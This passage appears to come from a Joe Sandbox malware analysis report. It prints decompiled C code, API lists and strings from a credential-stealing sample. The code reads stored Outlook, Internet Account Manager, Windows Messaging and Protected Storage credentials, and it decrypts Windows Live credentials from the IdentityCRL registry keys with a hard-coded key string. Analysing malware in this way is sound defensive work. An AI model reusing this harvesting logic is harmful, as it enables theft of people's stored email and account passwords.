                                                                                                                                                                        0x0040bc32
                                                                                                                                                                        0x0040bc37
                                                                                                                                                                        0x0040bc39
                                                                                                                                                                        0x0040bc5c
                                                                                                                                                                        0x0040bc66
                                                                                                                                                                        0x0040bc6c
                                                                                                                                                                        0x0040bc76
                                                                                                                                                                        0x0040bc97
                                                                                                                                                                        0x0040bc9b
                                                                                                                                                                        0x0040bce9
                                                                                                                                                                        0x0040bcea
                                                                                                                                                                        0x0040bcf5
                                                                                                                                                                        0x0040bcfa
                                                                                                                                                                        0x0040bd02
                                                                                                                                                                        0x0040bd08
                                                                                                                                                                        0x0040bd04
                                                                                                                                                                        0x0040bd04
                                                                                                                                                                        0x0040bd04
                                                                                                                                                                        0x0040bd11
                                                                                                                                                                        0x0040bd1e
                                                                                                                                                                        0x0040bd32
                                                                                                                                                                        0x0040bd3d
                                                                                                                                                                        0x0040bd50
                                                                                                                                                                        0x0040bd52
                                                                                                                                                                        0x0040bd54
                                                                                                                                                                        0x0040bdc4
                                                                                                                                                                        0x0040bdc4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040bd56
                                                                                                                                                                        0x0040bd5c
                                                                                                                                                                        0x0040bd6f
                                                                                                                                                                        0x0040bd75
                                                                                                                                                                        0x0040bd77
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040bd79
                                                                                                                                                                        0x0040bd7e
                                                                                                                                                                        0x0040bd80
                                                                                                                                                                        0x0040bd8e
                                                                                                                                                                        0x0040bd9a
                                                                                                                                                                        0x0040bd9c
                                                                                                                                                                        0x0040bd9e
                                                                                                                                                                        0x0040bda5
                                                                                                                                                                        0x0040bdb0
                                                                                                                                                                        0x0040bdb0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040bd9e
                                                                                                                                                                        0x0040bd88
                                                                                                                                                                        0x0040bd8a
                                                                                                                                                                        0x0040bd8c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040bdb6
                                                                                                                                                                        0x0040bdbe
                                                                                                                                                                        0x0040bdc0
                                                                                                                                                                        0x0040bdc0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040bd5c
                                                                                                                                                                        0x0040bd54
                                                                                                                                                                        0x0040bca1
                                                                                                                                                                        0x0040bca6
                                                                                                                                                                        0x0040bca8
                                                                                                                                                                        0x0040bce7
                                                                                                                                                                        0x0040bce7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040bce7
                                                                                                                                                                        0x0040bcaa
                                                                                                                                                                        0x0040bcb1
                                                                                                                                                                        0x0040bcb9
                                                                                                                                                                        0x0040bcbe
                                                                                                                                                                        0x0040bcc7
                                                                                                                                                                        0x0040bcd4
                                                                                                                                                                        0x0040bcda
                                                                                                                                                                        0x0040bcda
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040bcc7
                                                                                                                                                                        0x0040bc85
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040bc85
                                                                                                                                                                        0x0040bc45
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040bc0d
                                                                                                                                                                        0x0040bc0d
                                                                                                                                                                        0x0040bc17
                                                                                                                                                                        0x0040bdca
                                                                                                                                                                        0x0040bdca
                                                                                                                                                                        0x0040bdd1
                                                                                                                                                                        0x0040bdd9
                                                                                                                                                                        0x0040bdde
                                                                                                                                                                        0x0040bde6
                                                                                                                                                                        0x0040bdef
                                                                                                                                                                        0x0040bdf5
                                                                                                                                                                        0x0040bdf5
                                                                                                                                                                        0x0040bdfc
                                                                                                                                                                        0x0040be00
                                                                                                                                                                        0x0040be08
                                                                                                                                                                        0x0040be11
                                                                                                                                                                        0x0040be1a
                                                                                                                                                                        0x0040be1f
                                                                                                                                                                        0x0040be1f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040be1f
                                                                                                                                                                        0x0040bbad
                                                                                                                                                                        0x0040bbad
                                                                                                                                                                        0x0040be21
                                                                                                                                                                        0x0040be27
                                                                                                                                                                        0x0040be27

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00404841: LoadLibraryA.KERNEL32(comctl32.dll,73B74DE0,?,00000000,?,?,?,0040BBA9,73B74DE0), ref: 00404860
                                                                                                                                                                          • Part of subcall function 00404841: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404872
                                                                                                                                                                          • Part of subcall function 00404841: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040BBA9,73B74DE0), ref: 00404886
                                                                                                                                                                          • Part of subcall function 00404841: MessageBoxA.USER32 ref: 004048B1
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040BDD9
                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 0040BDEF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                                        • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                                        • API String ID: 745651260-375988210
                                                                                                                                                                        • Opcode ID: e1159f30e00c98f05f2d67921a14677ae0d548148ce7ab1f7a7c6c893690e61f
                                                                                                                                                                        • Instruction ID: 8d811f0c9aed7e5f9a0d70865fafe098279c62815184764300974fb8b6b83255
                                                                                                                                                                        • Opcode Fuzzy Hash: e1159f30e00c98f05f2d67921a14677ae0d548148ce7ab1f7a7c6c893690e61f
                                                                                                                                                                        • Instruction Fuzzy Hash: A8618C71508345ABC720AFA1DC49A9BBBF9FF84705F00483FF545A22A0DB789904CB5E
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00403C17 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184librarystringloaderCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 67%
                                                                                                                                                                        			E00403C17(signed int __ecx, void* __eflags, void* __fp0) {
				char _v8;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t42;
				void* _t56;
				void* _t58;
				void* _t60;
				void* _t62;
				void* _t64;
				void* _t66;
				char* _t79;
				void* _t82;
				_Unknown_base(*)()* _t93;
				void* _t94;
				void* _t96;
				void* _t104;
				signed int _t106;
				char* _t114;
				_Unknown_base(*)()* _t130;
				void* _t142;

				_t142 = __fp0;
				_t98 = __ecx;
				_push(__ecx);
				_t106 = __ecx;
				_t96 = __ecx + 0x87c;
				 *(_t96 + 0xc) =  *(_t96 + 0xc) & 0x00000000;
				E0040EF05(_t96);
				_t42 = LoadLibraryA("pstorec.dll"); // executed
				 *(_t96 + 8) = _t42;
				if(_t42 == 0) {
					L4:
					E0040EF05(_t96);
				} else {
					_t93 = GetProcAddress(_t42, "PStoreCreateInstance");
					_t130 = _t93;
					_t98 = 0 | _t130 != 0x00000000;
					 *(_t96 + 0x10) = _t93;
					if(_t130 != 0) {
						goto L4;
					} else {
						_t98 = _t96 + 4;
						_t94 =  *_t93(_t96 + 4, 0, 0, 0);
						_t132 = _t94;
						if(_t94 != 0) {
							goto L4;
						} else {
							 *(_t96 + 0xc) = 1;
						}
					}
				}
				E004047AA(_t106 + 0x890, _t132);
				E004036A6(_t98, _t106, _t106 + 0x890, _t142, L"www.google.com/Please log in to your Gmail account");
				E004036A6(_t98, _t106, _t106 + 0x890, _t142, L"www.google.com:443/Please log in to your Gmail account");
				E004036A6(_t98, _t106, _t106 + 0x890, _t142, L"www.google.com/Please log in to your Google Account");
				E004036A6(_t98, _t106, _t106 + 0x890, _t142, L"www.google.com:443/Please log in to your Google Account");
				_push(_t106 + 0x858); // executed
				E004076B7(_t98, _t132); // executed
				E00407306(_t98, _t106 + 0x86c); // executed
				E004077C5(_t132, _t106 + 0x878); // executed
				_t56 = E0040F1B0(0x80000001, "Software\\Microsoft\\Internet Account Manager\\Accounts",  &_v8);
				_t133 = _t56;
				if(_t56 == 0) {
					E00402B92(_t98,  &_v8, _t133, _t142, _t106, 1);
				}
				_t58 = E0040F1B0(0x80000001, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts",  &_v8);
				_t134 = _t58;
				if(_t58 == 0) {
					E00402B92(_t98,  &_v8, _t134, _t142, _t106, 5);
				}
				E00402C1E(_t98, _t142, _t106); // executed
				 *((intOrPtr*)(_t106 + 0xb1c)) = 6;
				_t60 = E00406282();
				_push( &_v8);
				if( *((intOrPtr*)(_t60 + 0x10)) != 1) {
					_push("Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles");
				} else {
					_push("Software\\Microsoft\\Windows Messaging Subsystem\\Profiles");
				}
				_push(0x80000001);
				_t62 = E0040F1B0();
				_t136 = _t62;
				if(_t62 != 0) {
					 *((char*)(_t106 + 0xa9c)) = 0;
				} else {
					E00402AE3( &_v8, _t136, _t142, _t106);
				}
				 *((intOrPtr*)(_t106 + 0xb1c)) = 0xf;
				_t64 = E0040F1B0(0x80000001, "Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles",  &_v8);
				_t137 = _t64;
				if(_t64 != 0) {
					 *((char*)(_t106 + 0xa9c)) = 0;
				} else {
					E00402AE3( &_v8, _t137, _t142, _t106);
				}
				 *((intOrPtr*)(_t106 + 0xb1c)) = 0x10;
				_t66 = E0040F1B0(0x80000001, "Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles",  &_v8);
				_t138 = _t66;
				if(_t66 != 0) {
					 *((char*)(_t106 + 0xa9c)) = 0;
				} else {
					E00402AE3( &_v8, _t138, _t142, _t106);
				}
				E0040EF1C(_t96);
				E004047FB(_t106 + 0x890);
				E00402F9C(_t106, _t98, _t142, 0x80000001); // executed
				E00402F9C(_t106, _t98, _t142, 0x80000002); // executed
				E00403278(_t142, _t106);
				E004034A5(_t98, _t138, _t142, _t106); // executed
				E00403946(_t138, _t142, _t106); // executed
				E0040378B(_t98, _t106, _t142, _t106); // executed
				_t79 = _t106 + 0xb20;
				_t139 =  *_t79;
				if( *_t79 != 0) {
					 *((intOrPtr*)(_t106 + 0xf34)) = 0xa;
					E0040D9D8(_t106 + 0x1c8, _t104, _t139, _t79, 0);
				}
				_t114 = _t106 + 0xc25;
				_t140 =  *_t114;
				if( *_t114 != 0) {
					strcpy(_t106 + 0x52a, _t106 + 0xe2f);
					 *((intOrPtr*)(_t106 + 0xf34)) = 0xb;
					E0040D9D8(_t106 + 0x1c8, _t104, _t140, _t114, 0);
				}
				_push(_t106 + 0x640); // executed
				E0040E057(_t140); // executed
				E0040DEC3(_t106 + 0x640);
				_t82 = E004113C4(_t106 + 0x870, _t106 + 0x870); // executed
				return _t82;
			}























                                                                                                                                                                        0x00403c17
                                                                                                                                                                        0x00403c17
                                                                                                                                                                        0x00403c1a
                                                                                                                                                                        0x00403c1e
                                                                                                                                                                        0x00403c20
                                                                                                                                                                        0x00403c26
                                                                                                                                                                        0x00403c2c
                                                                                                                                                                        0x00403c36
                                                                                                                                                                        0x00403c40
                                                                                                                                                                        0x00403c43
                                                                                                                                                                        0x00403c75
                                                                                                                                                                        0x00403c77
                                                                                                                                                                        0x00403c45
                                                                                                                                                                        0x00403c4b
                                                                                                                                                                        0x00403c53
                                                                                                                                                                        0x00403c55
                                                                                                                                                                        0x00403c58
                                                                                                                                                                        0x00403c5d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403c5f
                                                                                                                                                                        0x00403c62
                                                                                                                                                                        0x00403c66
                                                                                                                                                                        0x00403c68
                                                                                                                                                                        0x00403c6a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403c6c
                                                                                                                                                                        0x00403c6c
                                                                                                                                                                        0x00403c6c
                                                                                                                                                                        0x00403c6a
                                                                                                                                                                        0x00403c5d
                                                                                                                                                                        0x00403c82
                                                                                                                                                                        0x00403c8c
                                                                                                                                                                        0x00403c96
                                                                                                                                                                        0x00403ca0
                                                                                                                                                                        0x00403caa
                                                                                                                                                                        0x00403cb5
                                                                                                                                                                        0x00403cb6
                                                                                                                                                                        0x00403cc2
                                                                                                                                                                        0x00403cce
                                                                                                                                                                        0x00403ce1
                                                                                                                                                                        0x00403ce9
                                                                                                                                                                        0x00403ceb
                                                                                                                                                                        0x00403cf3
                                                                                                                                                                        0x00403cf3
                                                                                                                                                                        0x00403d06
                                                                                                                                                                        0x00403d0e
                                                                                                                                                                        0x00403d10
                                                                                                                                                                        0x00403d18
                                                                                                                                                                        0x00403d18
                                                                                                                                                                        0x00403d1e
                                                                                                                                                                        0x00403d23
                                                                                                                                                                        0x00403d2d
                                                                                                                                                                        0x00403d39
                                                                                                                                                                        0x00403d3a
                                                                                                                                                                        0x00403d43
                                                                                                                                                                        0x00403d3c
                                                                                                                                                                        0x00403d3c
                                                                                                                                                                        0x00403d3c
                                                                                                                                                                        0x00403d48
                                                                                                                                                                        0x00403d4d
                                                                                                                                                                        0x00403d55
                                                                                                                                                                        0x00403d57
                                                                                                                                                                        0x00403d64
                                                                                                                                                                        0x00403d59
                                                                                                                                                                        0x00403d5d
                                                                                                                                                                        0x00403d5d
                                                                                                                                                                        0x00403d79
                                                                                                                                                                        0x00403d83
                                                                                                                                                                        0x00403d8b
                                                                                                                                                                        0x00403d8d
                                                                                                                                                                        0x00403d9a
                                                                                                                                                                        0x00403d8f
                                                                                                                                                                        0x00403d93
                                                                                                                                                                        0x00403d93
                                                                                                                                                                        0x00403daf
                                                                                                                                                                        0x00403db9
                                                                                                                                                                        0x00403dc1
                                                                                                                                                                        0x00403dc3
                                                                                                                                                                        0x00403dd0
                                                                                                                                                                        0x00403dc5
                                                                                                                                                                        0x00403dc9
                                                                                                                                                                        0x00403dc9
                                                                                                                                                                        0x00403dd9
                                                                                                                                                                        0x00403de4
                                                                                                                                                                        0x00403df0
                                                                                                                                                                        0x00403dfc
                                                                                                                                                                        0x00403e02
                                                                                                                                                                        0x00403e08
                                                                                                                                                                        0x00403e0e
                                                                                                                                                                        0x00403e14
                                                                                                                                                                        0x00403e19
                                                                                                                                                                        0x00403e1f
                                                                                                                                                                        0x00403e22
                                                                                                                                                                        0x00403e2d
                                                                                                                                                                        0x00403e37
                                                                                                                                                                        0x00403e37
                                                                                                                                                                        0x00403e3c
                                                                                                                                                                        0x00403e42
                                                                                                                                                                        0x00403e45
                                                                                                                                                                        0x00403e55
                                                                                                                                                                        0x00403e65
                                                                                                                                                                        0x00403e6f
                                                                                                                                                                        0x00403e6f
                                                                                                                                                                        0x00403e7a
                                                                                                                                                                        0x00403e7b
                                                                                                                                                                        0x00403e81
                                                                                                                                                                        0x00403e8d
                                                                                                                                                                        0x00403e96

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040EF05: FreeLibrary.KERNELBASE(?,0040EF39,?,?,?,?,?,?,00404221), ref: 0040EF11
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C36
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4B
                                                                                                                                                                        • strcpy.MSVCRT(?,?), ref: 00403E55
                                                                                                                                                                        Strings
                                                                                                                                                                        • pstorec.dll, xrefs: 00403C31
                                                                                                                                                                        • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD7
                                                                                                                                                                        • www.google.com/Please log in to your Gmail account, xrefs: 00403C87
                                                                                                                                                                        • www.google.com/Please log in to your Google Account, xrefs: 00403C9B
                                                                                                                                                                        • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6F
                                                                                                                                                                        • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D43
                                                                                                                                                                        • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA5
                                                                                                                                                                        • PStoreCreateInstance, xrefs: 00403C45
                                                                                                                                                                        • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C91
                                                                                                                                                                        • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3C
                                                                                                                                                                        • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA5
                                                                                                                                                                        • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Library$AddressFreeLoadProcstrcpy
                                                                                                                                                                        • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                        • API String ID: 2884822230-317895162
                                                                                                                                                                        • Opcode ID: edd8b6eb8bcfee5f27bfe3d894378078f305261ef97242b4e9c725312b665777
                                                                                                                                                                        • Instruction ID: c79aa312a60a802310c0dbcdda9968b0b76b201639e98401828b305836cf62c0
                                                                                                                                                                        • Opcode Fuzzy Hash: edd8b6eb8bcfee5f27bfe3d894378078f305261ef97242b4e9c725312b665777
                                                                                                                                                                        • Instruction Fuzzy Hash: BE51C472604601BAD710AF72CC46FDABA6CAF01709F14017FF905B61C2EB7DAB548A99
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040E057 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 231 40e057-40e08c call 412360 RegOpenKeyExA 234 40e092-40e0a6 RegOpenKeyExA 231->234 235 40e18e-40e194 231->235 236 40e184-40e188 RegCloseKey 234->236 237 40e0ac-40e0d5 RegQueryValueExA 234->237 236->235 238 40e17a-40e17e RegCloseKey 237->238 239 40e0db-40e0ea call 4047aa 237->239 238->236 239->238 242 40e0f0-40e128 call 40481b 239->242 242->238 245 40e12a-40e132 242->245 246 40e170-40e174 LocalFree 245->246 247 40e134-40e16b memcpy * 2 call 40dd59 245->247 246->238 247->246
                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                        			E0040E057(void* __eflags, void* _a4, int _a8, int _a12, void* _a16, char _a20, void* _a24, int _a28, void* _a32, int _a36, void _a40, void _a104) {
				void* _v0;
				void* __esi;
				long _t34;
				long _t36;
				long _t40;
				void* _t64;
				void* _t68;
				int _t73;

				E00412360(0x102c, _t64);
				_t34 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\IdentityCRL", 0, 0x20019,  &_v0); // executed
				if(_t34 != 0) {
					L10:
					return _t34;
				}
				_t36 = RegOpenKeyExA(_v0, "Dynamic Salt", 0, 0x20019,  &_a4); // executed
				if(_t36 != 0) {
					L9:
					_t34 = RegCloseKey(_v0); // executed
					goto L10;
				}
				_a8 = 0x1000;
				_t40 = RegQueryValueExA(_a4, "Value", 0,  &_a36,  &_a40,  &_a8);
				_t81 = _t40;
				if(_t40 == 0) {
					_t63 = _a4 + 0xc;
					if(E004047AA(_a4 + 0xc, _t81) != 0) {
						_a20 = _a8;
						_a24 =  &_a40;
						_t73 = 0x40;
						_t68 = L"%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd";
						_a28 = _t73;
						_a32 = _t68;
						if(E0040481B(_t63,  &_a20,  &_a28,  &_a12) != 0) {
							if(_a12 < 0x400) {
								memcpy( &_a40, _t68, _t73);
								memcpy( &_a104, _a16, _a12);
								E0040DD59(_t64, _a12 + _t73, _a4,  &_a40, _a12 + _t73, _v0);
							}
							LocalFree(_a16);
						}
					}
				}
				RegCloseKey(_a4);
				goto L9;
			}











                                                                                                                                                                        0x0040e062
                                                                                                                                                                        0x0040e088
                                                                                                                                                                        0x0040e08c
                                                                                                                                                                        0x0040e18e
                                                                                                                                                                        0x0040e194
                                                                                                                                                                        0x0040e194
                                                                                                                                                                        0x0040e0a2
                                                                                                                                                                        0x0040e0a6
                                                                                                                                                                        0x0040e184
                                                                                                                                                                        0x0040e188
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040e188
                                                                                                                                                                        0x0040e0c5
                                                                                                                                                                        0x0040e0cd
                                                                                                                                                                        0x0040e0d3
                                                                                                                                                                        0x0040e0d5
                                                                                                                                                                        0x0040e0de
                                                                                                                                                                        0x0040e0ea
                                                                                                                                                                        0x0040e0f4
                                                                                                                                                                        0x0040e0fe
                                                                                                                                                                        0x0040e102
                                                                                                                                                                        0x0040e112
                                                                                                                                                                        0x0040e119
                                                                                                                                                                        0x0040e11d
                                                                                                                                                                        0x0040e128
                                                                                                                                                                        0x0040e132
                                                                                                                                                                        0x0040e13b
                                                                                                                                                                        0x0040e150
                                                                                                                                                                        0x0040e16b
                                                                                                                                                                        0x0040e16b
                                                                                                                                                                        0x0040e174
                                                                                                                                                                        0x0040e174
                                                                                                                                                                        0x0040e128
                                                                                                                                                                        0x0040e0ea
                                                                                                                                                                        0x0040e17e
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E80,?), ref: 0040E088
                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E80,?), ref: 0040E0A2
                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E80,?), ref: 0040E0CD
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E80,?), ref: 0040E17E
                                                                                                                                                                          • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,73AFF420), ref: 004047B2
                                                                                                                                                                          • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                                                                                                                                                                        • memcpy.MSVCRT ref: 0040E13B
                                                                                                                                                                        • memcpy.MSVCRT ref: 0040E150
                                                                                                                                                                          • Part of subcall function 0040DD59: RegOpenKeyExA.ADVAPI32(p@,Creds,00000000,00020019,p@,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040E170,?,?,?,?), ref: 0040DD83
                                                                                                                                                                          • Part of subcall function 0040DD59: memset.MSVCRT ref: 0040DDA1
                                                                                                                                                                          • Part of subcall function 0040DD59: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040DEA5
                                                                                                                                                                          • Part of subcall function 0040DD59: RegCloseKey.ADVAPI32(?), ref: 0040DEB6
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E80,?), ref: 0040E174
                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E80,?), ref: 0040E188
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                        • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                                                                        • API String ID: 2768085393-1693574875
                                                                                                                                                                        • Opcode ID: 7df82dd4f7763ce5193550669c390a20838b5133b5989fa9b4096a2fc0febe08
                                                                                                                                                                        • Instruction ID: a1b69f5673053fc040be98c60ebfc88e8990dfc0172556f981ec686efddd513d
                                                                                                                                                                        • Opcode Fuzzy Hash: 7df82dd4f7763ce5193550669c390a20838b5133b5989fa9b4096a2fc0febe08
                                                                                                                                                                        • Instruction Fuzzy Hash: 99313CB2504305AFD700DF51DC40E9BBBECEF88798F00493AFA94E2160D775DA598B6A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0041211A Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 249 41211a-412136 call 412308 GetModuleHandleA 252 412157-41215a 249->252 253 412138-412143 249->253 255 412183-4121d0 __set_app_type __p__fmode __p__commode call 412304 252->255 253->252 254 412145-41214e 253->254 256 412150-412155 254->256 257 41216f-412173 254->257 262 4121d2-4121dd __setusermatherr 255->262 263 4121de-412238 call 4122f2 _initterm __getmainargs _initterm 255->263 256->252 260 41215c-412163 256->260 257->252 261 412175-412177 257->261 260->252 264 412165-41216d 260->264 265 41217d-412180 261->265 262->263 268 412274-412277 263->268 269 41223a-412242 263->269 264->265 265->255 272 412251-412255 268->272 273 412279-41227d 268->273 270 412244-412246 269->270 271 412248-41224b 269->271 270->269 270->271 271->272 274 41224d-41224e 271->274 275 412257-412259 272->275 276 41225b-41226c GetStartupInfoA 272->276 273->268 274->272 275->274 275->276 277 41227f-412281 276->277 278 41226e-412272 276->278 279 412282-412296 GetModuleHandleA call 40bb8d 277->279 278->279 282 412298-412299 exit 279->282 283 41229f-4122df _cexit call 412341 279->283 282->283
                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                        			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t33;
				intOrPtr* _t35;
				intOrPtr* _t36;
				void* _t39;
				void _t41;
				intOrPtr _t48;
				signed int _t50;
				int _t52;
				intOrPtr _t55;
				signed int _t56;
				signed int _t57;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr* _t65;
				intOrPtr* _t69;
				int _t70;
				void* _t71;
				intOrPtr _t79;

				_push(0x70);
				_push(0x4133e0);
				E00412308(__ebx, __edi, __esi);
				_t33 = GetModuleHandleA(0);
				if(_t33->i != 0x5a4d) {
					L4:
					 *(_t71 - 0x1c) = 0;
				} else {
					_t65 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
					if( *_t65 != 0x4550) {
						goto L4;
					} else {
						_t56 =  *(_t65 + 0x18) & 0x0000ffff;
						if(_t56 == 0x10b) {
							__eflags =  *((intOrPtr*)(_t65 + 0x74)) - 0xe;
							if( *((intOrPtr*)(_t65 + 0x74)) <= 0xe) {
								goto L4;
							} else {
								_t57 = 0;
								__eflags =  *(_t65 + 0xe8);
								goto L9;
							}
						} else {
							if(_t56 == 0x20b) {
								__eflags =  *((intOrPtr*)(_t65 + 0x84)) - 0xe;
								if( *((intOrPtr*)(_t65 + 0x84)) <= 0xe) {
									goto L4;
								} else {
									_t57 = 0;
									__eflags =  *(_t65 + 0xf8);
									L9:
									_t9 = __eflags != 0;
									__eflags = _t9;
									 *(_t71 - 0x1c) = _t57 & 0xffffff00 | _t9;
								}
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t71 - 4) = 0;
				__set_app_type(2);
				 *0x418b6c =  *0x418b6c | 0xffffffff;
				 *0x418b70 =  *0x418b70 | 0xffffffff;
				_t35 = __p__fmode();
				_t62 =  *0x417b8c; // 0x0
				 *_t35 = _t62;
				_t36 = __p__commode();
				_t63 =  *0x417b88; // 0x0
				 *_t36 = _t63;
				 *0x418b68 =  *_adjust_fdiv;
				_t39 = E00412304();
				_t79 =  *0x417000; // 0x1
				if(_t79 == 0) {
					__setusermatherr(E00412304);
					_pop(_t63);
				}
				E004122F2(_t39);
				_push(0x4133b4);
				_push(0x4133b0);
				L004122EC();
				_t41 =  *0x417b84; // 0x0
				 *(_t71 - 0x20) = _t41;
				 *(_t71 - 0x30) = __getmainargs(_t71 - 0x2c, _t71 - 0x28, _t71 - 0x24,  *0x417b80, _t71 - 0x20);
				_push(0x4133ac);
				_push(0x413398); // executed
				L004122EC(); // executed
				_t69 =  *_acmdln;
				 *((intOrPtr*)(_t71 - 0x34)) = _t69;
				if( *_t69 != 0x22) {
					while(1) {
						__eflags =  *_t69 - 0x20;
						if(__eflags <= 0) {
							goto L17;
						}
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
					}
				} else {
					do {
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
